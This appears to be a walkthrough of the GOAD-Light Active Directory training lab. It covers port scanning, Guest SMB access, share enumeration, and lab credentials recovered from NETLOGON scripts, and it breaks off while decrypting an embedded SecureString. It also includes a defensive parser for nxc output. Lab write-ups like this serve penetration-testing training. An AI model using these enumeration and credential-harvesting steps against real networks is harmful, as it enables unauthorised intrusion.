GOAD-Light

This is the lightweight version of GOAD without the essos domain. The lab is built for lower-spec machines (roughly 20GB of RAM minimum).

Download: https://github.com/Orange-Cyberdefense/GOAD

https://orange-cyberdefense.github.io/GOAD/labs/GOAD-Light

Compared with the full GOAD, it lacks:

  • Cross-forest attack scenarios
  • MSSQL linked server / trusted link lateral-movement scenarios
  • Some vulnerability scenarios that depend on old systems / old patch states
  • AD CS certificate services attack scenarios

Domain: sevenkingdoms.local

  • kingslanding: DC01 running Windows Server 2019 (Windows Defender enabled by default)

Domain: north.sevenkingdoms.local

  • winterfell: DC02 running Windows Server 2019 (Windows Defender enabled by default)
  • castelblack: SRV02 running Windows Server 2019 (Windows Defender disabled by default)

Environment setup

Before anything else, bridge a VirtualBox network adapter into Kali.

Add the domain names to hosts so the later steps are easier to reproduce

sudo tee -a /etc/hosts <<'EOF'
192.168.56.10 kingslanding.sevenkingdoms.local sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
EOF

Network discovery and information gathering

We already know the network range is 192.168.56.0/24, so start with nmap to find live hosts and ports.

nmap -sP 192.168.56.0/24

MAC Address: 08:00:27:16:F2:7B (Oracle VirtualBox virtual NIC)
Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)
Host is up (0.00016s latency).
MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
Host is up (0.00017s latency).
MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)
Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
Host is up (0.00023s latency).

  • kingslanding.sevenkingdoms.local: 192.168.56.10
  • winterfell.north.sevenkingdoms.local: 192.168.56.11
  • castelblack.north.sevenkingdoms.local: 192.168.56.22

These three IPs are the focus. Scan their ports to see which services are running.

nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-31 14:57 +0800
Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)
Host is up (0.00020s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2026-05-31T02:50:06
|_Not valid after: 2027-05-31T02:50:06
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2026-05-31T02:50:06
|_Not valid after: 2027-05-31T02:50:06
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2026-05-31T02:50:06
|_Not valid after: 2027-05-31T02:50:06
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2026-05-31T02:50:06
|_Not valid after: 2027-05-31T02:50:06
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: KINGSLANDING
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: kingslanding.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-31T06:59:26+00:00
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Not valid before: 2026-05-30T02:31:32
|_Not valid after: 2026-11-29T02:31:32
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/wsmans?
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2026-05-29T19:16:32
|_Not valid after: 2029-05-28T19:16:32
|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49780/tcp open msrpc Microsoft Windows RPC
49862/tcp open msrpc Microsoft Windows RPC
49998/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-31T06:59:26
|_ start_date: N/A
|_clock-skew: mean: -14s, deviation: 0s, median: -14s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0a:a8:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
Host is up (0.00017s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2026-05-31T03:40:45
|_Not valid after: 2027-05-31T03:40:45
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2026-05-31T03:40:45
|_Not valid after: 2027-05-31T03:40:45
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2026-05-31T03:40:45
|_Not valid after: 2027-05-31T03:40:45
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2026-05-31T03:40:45
|_Not valid after: 2027-05-31T03:40:45
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
| rdp-ntlm-info:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: WINTERFELL
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: winterfell.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-31T06:59:04+00:00
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Not valid before: 2026-05-30T02:53:40
|_Not valid after: 2026-11-29T02:53:40
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/wsmans?
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2026-05-29T19:18:45
|_Not valid after: 2029-05-28T19:18:45
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
51116/tcp open msrpc Microsoft Windows RPC
57356/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)
Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-31T06:59:04
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:f6:8f (Oracle VirtualBox virtual NIC)
|_clock-skew: mean: -33s, deviation: 0s, median: -33s
Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
Host is up (0.00031s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 192.168.56.22:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-05-31T03:46:28
|_Not valid after: 2056-05-31T03:46:28
|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
| ms-sql-ntlm-info:
| 192.168.56.22:1433:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: CASTELBLACK
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: castelblack.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2026-05-30T03:06:25
|_Not valid after: 2026-11-29T03:06:25
| rdp-ntlm-info:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: CASTELBLACK
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: castelblack.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-31T06:59:36+00:00
|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/wsmans?
|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2026-05-29T19:20:59
|_Not valid after: 2029-05-28T19:20:59
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
55452/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-05-31T03:46:28
|_Not valid after: 2056-05-31T03:46:28
| ms-sql-info:
| 192.168.56.22:55452:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 55452
|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
| ms-sql-ntlm-info:
| 192.168.56.22:55452:
| Target_Name: NORTH
| NetBIOS_Domain_Name: NORTH
| NetBIOS_Computer_Name: CASTELBLACK
| DNS_Domain_Name: north.sevenkingdoms.local
| DNS_Computer_Name: castelblack.north.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
57413/tcp open msrpc Microsoft Windows RPC
57437/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:A2:3A:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-31T06:59:35
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a2:3a:39 (Oracle VirtualBox virtual NIC)
|_clock-skew: mean: -4s, deviation: 0s, median: -4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 138.62 seconds

Key ports and services at a glance

That is a lot of output; pick out the important parts.

Topology confirmed

192.168.56.10 KINGSLANDING DC01 sevenkingdoms.local

192.168.56.11 WINTERFELL DC02 north.sevenkingdoms.local

192.168.56.22 CASTELBLACK SRV02 north.sevenkingdoms.local

Alternatively: nxc smb 192.168.56.0/24

A quicker summary of the key services on the three hosts:

DC01:
  • 53 DNS
  • 80 IIS / ADCS Web Enrollment
  • 88 Kerberos
  • 389/636 LDAP/LDAPS
  • 3268/3269 Global Catalog
  • 445 SMB, signing required
  • 3389 RDP
  • 5985/5986 WinRM

DC02:
  • 53 DNS
  • 88 Kerberos
  • 389/636 LDAP/LDAPS
  • 3268/3269 Global Catalog
  • 445 SMB, signing required
  • 3389 RDP
  • 5985/5986 WinRM

SRV02:
  • 80 IIS
  • 445 SMB, signing enabled but not required
  • 1433 MSSQL
  • 55452 MSSQL dynamic port
  • 3389 RDP
  • 5985/5986 WinRM

SRV02's SMB signing is "enabled but not required". That is a high-priority finding: it is what makes the later SMB enumeration, Responder/LLMNR and NTLM relay steps worth reproducing.

First confirm the domain names, the DCs, the SMB policy and the anonymous-access situation.

Domain information enumeration

dig @192.168.56.10 -t SRV _ldap._tcp.sevenkingdoms.local

Returns: _ldap._tcp.sevenkingdoms.local. 600 IN SRV 0 100 389 kingslanding.sevenkingdoms.local.

The LDAP port is 389 and the server is kingslanding.sevenkingdoms.local

dig @192.168.56.10 -t SRV _kerberos._tcp.sevenkingdoms.local

Returns: _kerberos._tcp.sevenkingdoms.local. 600 IN SRV 0 100 88 kingslanding.sevenkingdoms.local.

The Kerberos port is 88 and the Kerberos authentication server (KDC) is kingslanding.sevenkingdoms.local

dig @192.168.56.11 -t SRV _ldap._tcp.north.sevenkingdoms.local

In the child domain (192.168.56.11):

_ldap._tcp.north.sevenkingdoms.local. 600 IN SRV 0 100 389 winterfell.north.sevenkingdoms.local.

The LDAP server for north.sevenkingdoms.local is winterfell, port 389

Anonymous access and share enumeration

Test whether Guest can log in to SMB

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 -u 'Guest' -p ''

SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\Guest: STATUS_ACCOUNT_DISABLED
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\Guest:
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\Guest: STATUS_ACCOUNT_DISABLED
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Guest with an empty password can log in to CASTELBLACK

Enumerate which shares Guest can access
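A defender reading the same nxc output wants the signing, null-session and empty-password state pulled out per host automatically rather than eyeballed across three lines. The following Python is an added example, not part of the original post or of the nxc project: it parses the nxc smb lines printed above (embedded here as a constructed sample) and turns them into findings with the matching fix. The regexes assume nxc's current banner layout (name/domain/signing/SMBv1/Null Auth fields), and the rule codes are my own names.

```python
import re

# Constructed sample input: the nxc smb banner and Guest-login lines exactly as
# the page prints them for the three GOAD-Light hosts.
SAMPLE_OUTPUT = """\
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\\Guest: STATUS_ACCOUNT_DISABLED
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\\Guest:
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\\Guest: STATUS_ACCOUNT_DISABLED
"""

# "[*]" banner line: host identity plus the SMB security flags nxc reports.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[\*\].*?\(domain:(?P<domain>[^)]+)\)"
    r".*?\(signing:(?P<signing>True|False)\)"
)
# "[+]" line: a login that succeeded; the text after ':' is the password used.
LOGIN_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+\S+\s+\[\+\]\s+(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>.*)$"
)


def parse_nxc_smb(output):
    """Return {ip: {host, domain, signing_required, null_auth, logins}}."""
    hosts = {}
    for line in output.splitlines():
        m = BANNER_RE.match(line)
        if m:
            hosts[m["ip"]] = {
                "host": m["host"],
                "domain": m["domain"],
                "signing_required": m["signing"] == "True",
                "null_auth": "(Null Auth:True)" in line,
                "logins": [],
            }
            continue
        m = LOGIN_RE.match(line)
        if m and m["ip"] in hosts:
            hosts[m["ip"]]["logins"].append(
                (m["domain"] + "\\" + m["user"], m["password"].strip())
            )
    return hosts


def findings(hosts):
    """Turn the parsed banners into (ip, code, remediation) tuples."""
    out = []
    for ip, h in sorted(hosts.items()):
        if not h["signing_required"]:
            out.append((ip, "SIGNING_NOT_REQUIRED",
                        "SMB signing is optional, so NTLM to this host is relayable; "
                        "enforce 'Microsoft network server: Digitally sign communications (always)' via GPO"))
        if h["null_auth"]:
            out.append((ip, "NULL_SESSION",
                        "null session accepted at banner level; verify what anonymous can actually enumerate"))
        for account, password in h["logins"]:
            if password == "":
                out.append((ip, "EMPTY_PASSWORD_LOGIN",
                            account + " authenticates with an empty password; disable the Guest account"))
    return out


if __name__ == "__main__":
    for ip, code, msg in findings(parse_nxc_smb(SAMPLE_OUTPUT)):
        print(ip, code, msg)
```

On the sample, CASTELBLACK (192.168.56.22) is the only host that gets both SIGNING_NOT_REQUIRED and EMPTY_PASSWORD_LOGIN, which is exactly the combination the walkthrough goes on to exploit.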

nxc smb 192.168.56.22 -u 'Guest' -p '' --shares

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\Guest:
SMB 192.168.56.22 445 CASTELBLACK [*] Enumerated shares
SMB 192.168.56.22 445 CASTELBLACK Share Permissions Remark
SMB 192.168.56.22 445 CASTELBLACK ----- ----------- ------
SMB 192.168.56.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 192.168.56.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 192.168.56.22 445 CASTELBLACK C$ Default share
SMB 192.168.56.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 192.168.56.22 445 CASTELBLACK public Basic Read share for all domain users

Guest has READ,WRITE on 'all'

Go into the all share and look at the files

smbclient //192.168.56.22/all -U 'Guest%' -c 'recurse; ls'

 . D 0 Sun May 31 17:04:31 2026
 .. D 0 Sun May 31 17:04:31 2026
 arya.txt A 413 Sun May 31 11:48:39 2026

 15638527 blocks of size 4096. 8043023 blocks available

The all share contains one file, arya.txt

Create a folder and download the file

mkdir -p castelblack-all
smbclient //192.168.56.22/all -U 'Guest%' -c 'lcd castelblack-all; get arya.txt'
cat castelblack-all/arya.txt

Hey Arya,

I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don't worry; I'll be back soon.

I left a little surprise for you in your room - the sword You've named "Needle." It felt fitting, given your skills. Take care of it, and it'll take care of you.

I'll explain everything when I return. Until then, stay sharp, sis.

Best,

John

Shares and credential breakthrough

From arya.txt to initial credentials

The gist of the letter: John left his sister a sword named Needle.

The most direct lead here is that the password may be related to Needle, but the username still has to be confirmed through further enumeration.

One open question: arya.txt on its own only points fairly strongly at the password Needle; the username arya.stark cannot be derived uniquely from the letter, and was confirmed by combining public GOAD material with later verification.

References:

https://cyb3rbyte.medium.com/goad-part-1-scanning-the-forest-reconnaissance-in-an-active-directory-jungle-53a125bd2486

https://cyb3rbyte.medium.com/goad-part-2-when-enumeration-bites-back-from-smb-to-r-i-p-ee7708c98b7d

https://cyb3rbyte.medium.com/goad-part-3-the-art-of-extraction-roasting-and-poisoning-for-domain-dominance-240aa6490dd1

Those articles enumerate users such as samwell.tarly directly with nxc smb live.hosts --users; my environment refuses anonymous SAMR enumeration, so the default policy of the current GOAD-Light version differs from the environment in those articles.

Verify the arya.stark / Needle credentials by logging in.

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \
  -u 'arya.stark' -p 'Needle'

This account can log in to 192.168.56.11 and 192.168.56.22

nxc smb 192.168.56.11 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'arya.stark' -p 'Needle' --shares

Enumerate shares with the credentials that worked

CASTELBLACK public READ,WRITE
CASTELBLACK all READ,WRITE
WINTERFELL NETLOGON READ
WINTERFELL SYSVOL READ

The public share is now readable and writable; look at what is in public

smbclient //192.168.56.22/public \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'recurse; ls'

Then look at all again

public is accessible but empty, and there is nothing new in all either

Reading NETLOGON and SYSVOL

List NETLOGON and SYSVOL

smbclient //192.168.56.11/NETLOGON \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'recurse; ls'
smbclient //192.168.56.11/SYSVOL \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'recurse; ls'
┌──(root㉿kali)-[~]
└─# smbclient //192.168.56.11/NETLOGON \
> -U 'north.sevenkingdoms.local/arya.stark%Needle' \
> -c 'recurse; ls'
 . D 0 Sun May 31 11:47:39 2026
 .. D 0 Sun May 31 11:47:39 2026
 script.ps1 A 165 Sun May 31 11:47:35 2026
 secret.ps1 A 869 Sun May 31 11:47:38 2026

 15638527 blocks of size 4096. 11399309 blocks available

┌──(root㉿kali)-[~]
└─# smbclient //192.168.56.11/SYSVOL \
> -U 'north.sevenkingdoms.local/arya.stark%Needle' \
> -c 'recurse; ls'
 . D 0 Sun May 31 10:39:17 2026
 .. D 0 Sun May 31 10:39:17 2026
 north.sevenkingdoms.local Dr 0 Sun May 31 10:39:17 2026

NETLOGON contains two scripts

script.ps1

secret.ps1

Download them

mkdir -p winterfell-netlogon

smbclient //192.168.56.11/NETLOGON \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'lcd winterfell-netlogon; get script.ps1; get secret.ps1'

cat winterfell-netlogon/script.ps1
cat winterfell-netlogon/secret.ps1

┌──(root㉿kali)-[~]
└─# cat winterfell-netlogon/script.ps1
# fake script in netlogon with creds
$task = '/c TODO'
$taskName = "fake task"
$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"
# passwords in sysvol still ...

┌──(root㉿kali)-[~]
└─# cat winterfell-netlogon/secret.ps1
# cypher script
# $domain="sevenkingdoms.local"
# $EncryptionKeyBytes = New-Object Byte[] 32
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
# $EncryptionKeyBytes | Out-File "encryption.key"
# $EncryptionKeyData = Get-Content "encryption.key"
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
# secret stored :
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
# T.L.

Script leak and secret.ps1 decryption

script.ps1 exposes a username and password outright:

$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"

secret.ps1

secret.ps1 is another leak. It is not plaintext but the output of PowerShell's SecureString encryption:

The comments already explain how it was produced: ConvertFrom-SecureString -Key with a custom AES key. $secret is the ciphertext and $keyData is the key, and both sit in the same file, so it can be decrypted directly.

In PowerShell:

# The 32-byte AES key copied from secret.ps1
$keyData = [byte[]](177,252,228,64,28,91,12,201,20,91,21,139,255,65,9,247,41,55,164,28,75,132,143,71,62,191,211,61,154,61,216,91)

